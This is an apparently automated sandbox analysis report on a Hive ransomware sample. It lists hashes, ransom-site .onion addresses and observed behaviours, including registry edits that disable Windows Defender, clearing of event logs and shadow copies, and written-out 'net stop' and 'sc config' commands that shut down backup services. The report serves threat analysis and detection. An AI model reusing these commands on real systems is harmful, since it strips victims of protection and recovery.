Overview
overview
10Static
static
8211xahcou.exe
windows7-x64
10211xahcou.exe
windows10-2004-x64
10hive.exe
windows7-x64
10hive.exe
windows10-2004-x64
10sjl8j6ap3.exe
windows7-x64
1sjl8j6ap3.exe
windows10-2004-x64
1windows_25...c5.exe
windows7-x64
10windows_25...c5.exe
windows10-2004-x64
10zi1ysv64h.exe
windows7-x64
10zi1ysv64h.exe
windows10-2004-x64
10Resubmissions
23-12-2022 20:19
221223-y39gvahb28 1023-12-2022 19:54
221223-ymz88scc8w 1023-12-2022 19:42
221223-yerbcsha78 10Analysis
-
max time kernel
107s -
max time network
99s -
platform
windows10-2004_x64 -
resource
win10v2004-20220901-en -
resource tags
arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system -
submitted
23-12-2022 19:42
Behavioral task
behavioral1
Sample
211xahcou.exe
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
211xahcou.exe
Resource
win10v2004-20220901-en
Behavioral task
behavioral3
Sample
hive.exe
Resource
win7-20221111-en
Behavioral task
behavioral4
Sample
hive.exe
Resource
win10v2004-20220812-en
Behavioral task
behavioral5
Sample
sjl8j6ap3.exe
Resource
win7-20220812-en
Behavioral task
behavioral6
Sample
sjl8j6ap3.exe
Resource
win10v2004-20221111-en
Behavioral task
behavioral7
Sample
windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
Resource
win7-20221111-en
Behavioral task
behavioral8
Sample
windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
Resource
win10v2004-20220812-en
Behavioral task
behavioral9
Sample
zi1ysv64h.exe
Resource
win7-20221111-en
General
-
Target
211xahcou.exe
-
Size
3.9MB
-
MD5
0e4d44dde522c07d09d9e3086cfae803
-
SHA1
d8dc26e2094869a0da78ecb47494c931419302dc
-
SHA256
33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277
-
SHA512
ac1f269b028217210a72fc5c2e0cb07461e2ff896f8b5ba65771787f99ec34b0f9951cf73d9d387086f79c348c343d147aebc2fd5b7e18da009bc2041e2eee06
-
SSDEEP
49152:e2NiZPNNirb/T2vO90dL3BmAFd4A64nsfJk0NuXCdmTQb0/6VCrrPrsbg11VgWA2:e2ANB04yIa0hsirubO
Malware Config
Extracted
C:\n8pw_HOW_TO_DECRYPT.txt
hive
http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/
http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/
Signatures
-
Hive
A ransomware written in Golang first seen in June 2021.
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" reg.exe -
Modifies security service 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe -
Clears Windows event logs 1 TTPs 3 IoCs
pid Process 4856 wevtutil.exe 4180 wevtutil.exe 4936 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 3732 bcdedit.exe 1192 bcdedit.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\hr-hr\n8pw_HOW_TO_DECRYPT.txt 211xahcou.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\Assets\Images\HelpAndFeedback\FeedbackThumbnail.png 211xahcou.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\LinkedInboxMediumTile.scale-100.png 211xahcou.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\move.svg._v2C3TJqZ5nafjw0uhA4u91Vv0rrx0ocj-xtSrLxhxr_NAAAADQAAAA0.cv2gj 211xahcou.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\it-it\n8pw_HOW_TO_DECRYPT.txt 211xahcou.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Place\RTL\contrast-black\MedTile.scale-100.png 211xahcou.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.XboxGamingOverlay_2.34.28001.0_x64__8wekyb3d8bbwe\Assets\SegXbox2.ttf 211xahcou.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\pt-br\ui-strings.js._v2C3TJqZ5nafjw0uhA4u91Vv0rrx0ocj-xtSrLxhxr_PAAAADwAAAA0.cv2gj 211xahcou.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_1.1911.21713.0_x64__8wekyb3d8bbwe\Assets\Store\AppIcon.scale-100.png 211xahcou.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WebMediaExtensions_1.0.20875.0_x64__8wekyb3d8bbwe\Assets\AppList.targetsize-60.png 211xahcou.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\nl-nl\ui-strings.js._v2C3TJqZ5nafjw0uhA4u91Vv0rrx0ocj-xtSrLxhxr_OgAAADoAAAA0.cv2gj 211xahcou.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\PowerPointVL_KMS_Client-ul-oob.xrm-ms._v2C3TJqZ5nafjw0uhA4u91Vv0rrx0ocj-xtSrLxhxr_HgAAAB4AAAA0.cv2gj 211xahcou.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectProR_Retail-pl.xrm-ms._v2C3TJqZ5nafjw0uhA4u91Vv0rrx0ocj-xtSrLxhxr_AAAAAAAAAAA0.cv2gj 211xahcou.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\PublisherR_Retail-pl.xrm-ms._v2C3TJqZ5nafjw0uhA4u91Vv0rrx0ocj-xtSrLxhxr_FgAAABYAAAA0.cv2gj 211xahcou.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxCalendarMediumTile.scale-200.png 211xahcou.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\root\ui-strings.js._v2C3TJqZ5nafjw0uhA4u91Vv0rrx0ocj-xtSrLxhxr_AAAAAAAAAAA0.cv2gj 211xahcou.exe File opened for modification C:\Program Files\Windows Media Player\Network Sharing\wmpnss_color120.jpg 211xahcou.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\OneNoteSectionGroupMedTile.scale-125.png 211xahcou.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_x64__8wekyb3d8bbwe\Assets\contrast-white\MicrosoftLogo.scale-200.png 211xahcou.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsSoundRecorder_10.1906.1972.0_x64__8wekyb3d8bbwe\Assets\VoiceRecorderAppList.contrast-black_targetsize-60_altform-unplated.png 211xahcou.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.targetsize-40_altform-unplated_contrast-white.png 211xahcou.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\HomeBanner_Dark.pdf._v2C3TJqZ5nafjw0uhA4u91Vv0rrx0ocj-xtSrLxhxr_CAAAAAgAAAA0.cv2gj 211xahcou.exe File opened for modification C:\Program Files\7-Zip\7z.sfx._v2C3TJqZ5nafjw0uhA4u91Vv0rrx0ocj-xtSrLxhxr_AAAAAAAAAAA0.cv2gj 211xahcou.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler-charts_ja.jar._v2C3TJqZ5nafjw0uhA4u91Vv0rrx0ocj-xtSrLxhxr_AAAAAAAAAAA0.cv2gj 211xahcou.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioPro2019VL_KMS_Client_AE-ul-oob.xrm-ms._v2C3TJqZ5nafjw0uhA4u91Vv0rrx0ocj-xtSrLxhxr_AAAAAAAAAAA0.cv2gj 211xahcou.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ca-es\ui-strings.js._v2C3TJqZ5nafjw0uhA4u91Vv0rrx0ocj-xtSrLxhxr_MgAAADIAAAA0.cv2gj 211xahcou.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\ru-ru\AppStore_icon.svg._v2C3TJqZ5nafjw0uhA4u91Vv0rrx0ocj-xtSrLxhxr_AAAAAAAAAAA0.cv2gj 211xahcou.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\ZX______.PFB._v2C3TJqZ5nafjw0uhA4u91Vv0rrx0ocj-xtSrLxhxr_AAAAAAAAAAA0.cv2gj 211xahcou.exe File opened for modification C:\Program Files (x86)\WindowsPowerShell\Modules\Pester\3.4.0\en-US\about_Mocking.help.txt 211xahcou.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsCamera_2018.826.98.0_neutral_split.scale-200_8wekyb3d8bbwe\AppxSignature.p7x 211xahcou.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\TXP_TicketedEvent_Light.png 211xahcou.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\images\themeless\web_documentcloud_logo.png._v2C3TJqZ5nafjw0uhA4u91Vv0rrx0ocj-xtSrLxhxr_JAAAACQAAAA0.cv2gj 211xahcou.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogoSmall.scale-100.png._v2C3TJqZ5nafjw0uhA4u91Vv0rrx0ocj-xtSrLxhxr_AAAAAAAAAAA0.cv2gj 211xahcou.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Assets\Square44x44Logo.targetsize-256.png 211xahcou.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Common.View.UWP\Strings\kn-IN\View3d\3DViewerProductDescription-universal.xml 211xahcou.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.People_10.1902.633.0_x64__8wekyb3d8bbwe\Assets\contrast-white\PeopleAppList.targetsize-24_altform-unplated.png 211xahcou.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.contrast-black_targetsize-64.png 211xahcou.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019R_OEM_Perp3-ppd.xrm-ms._v2C3TJqZ5nafjw0uhA4u91Vv0rrx0ocj-xtSrLxhxr_AAAAAAAAAAA0.cv2gj 211xahcou.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioStd2019R_OEM_Perp-ppd.xrm-ms._v2C3TJqZ5nafjw0uhA4u91Vv0rrx0ocj-xtSrLxhxr_OAAAADgAAAA0.cv2gj 211xahcou.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioStdVL_MAK-ul-oob.xrm-ms._v2C3TJqZ5nafjw0uhA4u91Vv0rrx0ocj-xtSrLxhxr_GgAAABoAAAA0.cv2gj 211xahcou.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\pt-br\n8pw_HOW_TO_DECRYPT.txt 211xahcou.exe File created C:\Program Files\Microsoft Office\root\Office16\3082\n8pw_HOW_TO_DECRYPT.txt 211xahcou.exe File opened for modification C:\Program Files\7-Zip\Lang\ast.txt._v2C3TJqZ5nafjw0uhA4u91Vv0rrx0ocj-xtSrLxhxr_FgAAABYAAAA0.cv2gj 211xahcou.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365SmallBusPremR_SubTrial3-ppd.xrm-ms._v2C3TJqZ5nafjw0uhA4u91Vv0rrx0ocj-xtSrLxhxr_DAAAAAwAAAA0.cv2gj 211xahcou.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxAccountsStoreLogo.scale-100.png 211xahcou.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-modules-spi-actions.xml._v2C3TJqZ5nafjw0uhA4u91Vv0rrx0ocj-xtSrLxhxr_BgAAAAYAAAA0.cv2gj 211xahcou.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-jvm.jar._v2C3TJqZ5nafjw0uhA4u91Vv0rrx0ocj-xtSrLxhxr_AAAAAAAAAAA0.cv2gj 211xahcou.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\SATIN\PREVIEW.GIF._v2C3TJqZ5nafjw0uhA4u91Vv0rrx0ocj-xtSrLxhxr_AAAAAAAAAAA0.cv2gj 211xahcou.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppList.targetsize-20_altform-unplated_contrast-black.png 211xahcou.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.diagnostic.ja_5.5.0.165303.jar._v2C3TJqZ5nafjw0uhA4u91Vv0rrx0ocj-xtSrLxhxr_AAAAAAAAAAA0.cv2gj 211xahcou.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\tl\LC_MESSAGES\vlc.mo._v2C3TJqZ5nafjw0uhA4u91Vv0rrx0ocj-xtSrLxhxr_AAAAAAAAAAA0.cv2gj 211xahcou.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsSoundRecorder_10.1906.1972.0_x64__8wekyb3d8bbwe\Assets\VoiceRecorderLogoExtensions.targetsize-24.png 211xahcou.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.targetsize-60_altform-unplated.png 211xahcou.exe File created C:\Program Files\Microsoft Office\root\Office16\MSIPC\cs\n8pw_HOW_TO_DECRYPT.txt 211xahcou.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioProO365R_SubTest-ppd.xrm-ms._v2C3TJqZ5nafjw0uhA4u91Vv0rrx0ocj-xtSrLxhxr_AAAAAAAAAAA0.cv2gj 211xahcou.exe File created C:\Program Files\Microsoft Office\PackageManifests\n8pw_HOW_TO_DECRYPT.txt 211xahcou.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioStdO365R_Subscription-ppd.xrm-ms._v2C3TJqZ5nafjw0uhA4u91Vv0rrx0ocj-xtSrLxhxr_AAAAAAAAAAA0.cv2gj 211xahcou.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\Images\Ratings\Yelp7.scale-125.png 211xahcou.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\ReactAssets\assets\RNApp\app\uwp\images\avatar_round_mask.png 211xahcou.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\ADDINS\EduWorks Data Streamer Add-In\MicrosoftDataStreamerforExcel.vsto._v2C3TJqZ5nafjw0uhA4u91Vv0rrx0ocj-xtSrLxhxr_AAAAAAAAAAA0.cv2gj 211xahcou.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.XboxApp_48.49.31001.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\GamesXboxHubWideTile.scale-125.png 211xahcou.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_3.6.73.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\Preview.scale-100_layoutdir-RTL.png 211xahcou.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\progress_spinner.gif._v2C3TJqZ5nafjw0uhA4u91Vv0rrx0ocj-xtSrLxhxr_AAAAAAAAAAA0.cv2gj 211xahcou.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\css\main.css._v2C3TJqZ5nafjw0uhA4u91Vv0rrx0ocj-xtSrLxhxr_EgAAABIAAAA0.cv2gj 211xahcou.exe -
Launches sc.exe 8 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 4056 sc.exe 1712 sc.exe 2444 sc.exe 4960 sc.exe 4332 sc.exe 1008 sc.exe 4352 sc.exe 2676 sc.exe -
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 2456 vssadmin.exe -
Opens file in notepad (likely ransom note) 1 IoCs
pid Process 3364 notepad.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 372 PING.EXE -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 4432 powershell.exe 4432 powershell.exe 3504 powershell.exe 3504 powershell.exe 2796 211xahcou.exe 2796 211xahcou.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeSecurityPrivilege 4856 wevtutil.exe Token: SeBackupPrivilege 4856 wevtutil.exe Token: SeSecurityPrivilege 4180 wevtutil.exe Token: SeBackupPrivilege 4180 wevtutil.exe Token: SeSecurityPrivilege 4936 wevtutil.exe Token: SeBackupPrivilege 4936 wevtutil.exe Token: SeIncreaseQuotaPrivilege 3184 wmic.exe Token: SeSecurityPrivilege 3184 wmic.exe Token: SeTakeOwnershipPrivilege 3184 wmic.exe Token: SeLoadDriverPrivilege 3184 wmic.exe Token: SeSystemProfilePrivilege 3184 wmic.exe Token: SeSystemtimePrivilege 3184 wmic.exe Token: SeProfSingleProcessPrivilege 3184 wmic.exe Token: SeIncBasePriorityPrivilege 3184 wmic.exe Token: SeCreatePagefilePrivilege 3184 wmic.exe Token: SeBackupPrivilege 3184 wmic.exe Token: SeRestorePrivilege 3184 wmic.exe Token: SeShutdownPrivilege 3184 wmic.exe Token: SeDebugPrivilege 3184 wmic.exe Token: SeSystemEnvironmentPrivilege 3184 wmic.exe Token: SeRemoteShutdownPrivilege 3184 wmic.exe Token: SeUndockPrivilege 3184 wmic.exe Token: SeManageVolumePrivilege 3184 wmic.exe Token: 33 3184 wmic.exe Token: 34 3184 wmic.exe Token: 35 3184 wmic.exe Token: 36 3184 wmic.exe Token: SeIncreaseQuotaPrivilege 4708 wmic.exe Token: SeSecurityPrivilege 4708 wmic.exe Token: SeTakeOwnershipPrivilege 4708 wmic.exe Token: SeLoadDriverPrivilege 4708 wmic.exe Token: SeSystemProfilePrivilege 4708 wmic.exe Token: SeSystemtimePrivilege 4708 wmic.exe Token: SeProfSingleProcessPrivilege 4708 wmic.exe Token: SeIncBasePriorityPrivilege 4708 wmic.exe Token: SeCreatePagefilePrivilege 4708 wmic.exe Token: SeBackupPrivilege 4708 wmic.exe Token: SeRestorePrivilege 4708 wmic.exe Token: SeShutdownPrivilege 4708 wmic.exe Token: SeDebugPrivilege 4708 wmic.exe Token: SeSystemEnvironmentPrivilege 4708 wmic.exe Token: SeRemoteShutdownPrivilege 4708 wmic.exe Token: SeUndockPrivilege 4708 wmic.exe Token: SeManageVolumePrivilege 4708 wmic.exe Token: 33 4708 wmic.exe Token: 34 4708 wmic.exe Token: 35 4708 wmic.exe Token: 36 4708 wmic.exe Token: SeIncreaseQuotaPrivilege 4708 wmic.exe Token: SeSecurityPrivilege 4708 wmic.exe Token: SeTakeOwnershipPrivilege 4708 wmic.exe Token: SeLoadDriverPrivilege 4708 wmic.exe Token: SeSystemProfilePrivilege 4708 wmic.exe Token: SeSystemtimePrivilege 4708 wmic.exe Token: SeProfSingleProcessPrivilege 4708 wmic.exe Token: SeIncBasePriorityPrivilege 4708 wmic.exe Token: SeCreatePagefilePrivilege 4708 wmic.exe Token: SeBackupPrivilege 4708 wmic.exe Token: SeRestorePrivilege 4708 wmic.exe Token: SeShutdownPrivilege 4708 wmic.exe Token: SeDebugPrivilege 4708 wmic.exe Token: SeSystemEnvironmentPrivilege 4708 wmic.exe Token: SeRemoteShutdownPrivilege 4708 wmic.exe Token: SeUndockPrivilege 4708 wmic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2796 wrote to memory of 4652 2796 211xahcou.exe 83 PID 2796 wrote to memory of 4652 2796 211xahcou.exe 83 PID 4652 wrote to memory of 4544 4652 net.exe 85 PID 4652 wrote to memory of 4544 4652 net.exe 85 PID 2796 wrote to memory of 4632 2796 211xahcou.exe 86 PID 2796 wrote to memory of 4632 2796 211xahcou.exe 86 PID 4632 wrote to memory of 3432 4632 net.exe 88 PID 4632 wrote to memory of 3432 4632 net.exe 88 PID 2796 wrote to memory of 116 2796 211xahcou.exe 89 PID 2796 wrote to memory of 116 2796 211xahcou.exe 89 PID 116 wrote to memory of 4520 116 net.exe 91 PID 116 wrote to memory of 4520 116 net.exe 91 PID 2796 wrote to memory of 1952 2796 211xahcou.exe 92 PID 2796 wrote to memory of 1952 2796 211xahcou.exe 92 PID 1952 wrote to memory of 2248 1952 net.exe 94 PID 1952 wrote to memory of 2248 1952 net.exe 94 PID 2796 wrote to memory of 2336 2796 211xahcou.exe 95 PID 2796 wrote to memory of 2336 2796 211xahcou.exe 95 PID 2336 wrote to memory of 4360 2336 net.exe 97 PID 2336 wrote to memory of 4360 2336 net.exe 97 PID 2796 wrote to memory of 4680 2796 211xahcou.exe 98 PID 2796 wrote to memory of 4680 2796 211xahcou.exe 98 PID 4680 wrote to memory of 1668 4680 net.exe 100 PID 4680 wrote to memory of 1668 4680 net.exe 100 PID 2796 wrote to memory of 2272 2796 211xahcou.exe 101 PID 2796 wrote to memory of 2272 2796 211xahcou.exe 101 PID 2272 wrote to memory of 748 2272 net.exe 103 PID 2272 wrote to memory of 748 2272 net.exe 103 PID 2796 wrote to memory of 536 2796 211xahcou.exe 104 PID 2796 wrote to memory of 536 2796 211xahcou.exe 104 PID 536 wrote to memory of 860 536 net.exe 106 PID 536 wrote to memory of 860 536 net.exe 106 PID 2796 wrote to memory of 4332 2796 211xahcou.exe 107 PID 2796 wrote to memory of 4332 2796 211xahcou.exe 107 PID 2796 wrote to memory of 1008 2796 211xahcou.exe 109 PID 2796 wrote to memory of 1008 2796 211xahcou.exe 109 PID 2796 wrote to memory of 4352 2796 211xahcou.exe 111 PID 2796 wrote to memory of 4352 2796 211xahcou.exe 111 PID 2796 wrote to memory of 2676 2796 211xahcou.exe 113 PID 2796 wrote to memory of 2676 2796 211xahcou.exe 113 PID 2796 wrote to memory of 4056 2796 211xahcou.exe 115 PID 2796 wrote to memory of 4056 2796 211xahcou.exe 115 PID 2796 wrote to memory of 1712 2796 211xahcou.exe 118 PID 2796 wrote to memory of 1712 2796 211xahcou.exe 118 PID 2796 wrote to memory of 2444 2796 211xahcou.exe 120 PID 2796 wrote to memory of 2444 2796 211xahcou.exe 120 PID 2796 wrote to memory of 4960 2796 211xahcou.exe 122 PID 2796 wrote to memory of 4960 2796 211xahcou.exe 122 PID 2796 wrote to memory of 2288 2796 211xahcou.exe 124 PID 2796 wrote to memory of 2288 2796 211xahcou.exe 124 PID 2796 wrote to memory of 3136 2796 211xahcou.exe 126 PID 2796 wrote to memory of 3136 2796 211xahcou.exe 126 PID 2796 wrote to memory of 4624 2796 211xahcou.exe 128 PID 2796 wrote to memory of 4624 2796 211xahcou.exe 128 PID 2796 wrote to memory of 4340 2796 211xahcou.exe 130 PID 2796 wrote to memory of 4340 2796 211xahcou.exe 130 PID 2796 wrote to memory of 4064 2796 211xahcou.exe 132 PID 2796 wrote to memory of 4064 2796 211xahcou.exe 132 PID 2796 wrote to memory of 760 2796 211xahcou.exe 134 PID 2796 wrote to memory of 760 2796 211xahcou.exe 134 PID 2796 wrote to memory of 3668 2796 211xahcou.exe 136 PID 2796 wrote to memory of 3668 2796 211xahcou.exe 136 PID 2796 wrote to memory of 4184 2796 211xahcou.exe 138 PID 2796 wrote to memory of 4184 2796 211xahcou.exe 138
Processes
-
C:\Users\Admin\AppData\Local\Temp\211xahcou.exe"C:\Users\Admin\AppData\Local\Temp\211xahcou.exe"1⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2796 -
C:\Windows\SYSTEM32\net.exenet.exe stop "SamSs" /y2⤵
- Suspicious use of WriteProcessMemory
PID:4652 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SamSs" /y3⤵PID:4544
-
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "SDRSVC" /y2⤵
- Suspicious use of WriteProcessMemory
PID:4632 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SDRSVC" /y3⤵PID:3432
-
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "SstpSvc" /y2⤵
- Suspicious use of WriteProcessMemory
PID:116 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SstpSvc" /y3⤵PID:4520
-
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "vmicvss" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1952 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "vmicvss" /y3⤵PID:2248
-
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "VSS" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2336 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VSS" /y3⤵PID:4360
-
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "wbengine" /y2⤵
- Suspicious use of WriteProcessMemory
PID:4680 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "wbengine" /y3⤵PID:1668
-
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "WebClient" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2272 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WebClient" /y3⤵PID:748
-
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "UnistoreSvc_1961a" /y2⤵
- Suspicious use of WriteProcessMemory
PID:536 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UnistoreSvc_1961a" /y3⤵PID:860
-
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "SamSs" start= disabled2⤵
- Launches sc.exe
PID:4332
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "SDRSVC" start= disabled2⤵
- Launches sc.exe
PID:1008
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "SstpSvc" start= disabled2⤵
- Launches sc.exe
PID:4352
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "vmicvss" start= disabled2⤵
- Launches sc.exe
PID:2676
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "VSS" start= disabled2⤵
- Launches sc.exe
PID:4056
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "wbengine" start= disabled2⤵
- Launches sc.exe
PID:1712
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "WebClient" start= disabled2⤵
- Launches sc.exe
PID:2444
-
-
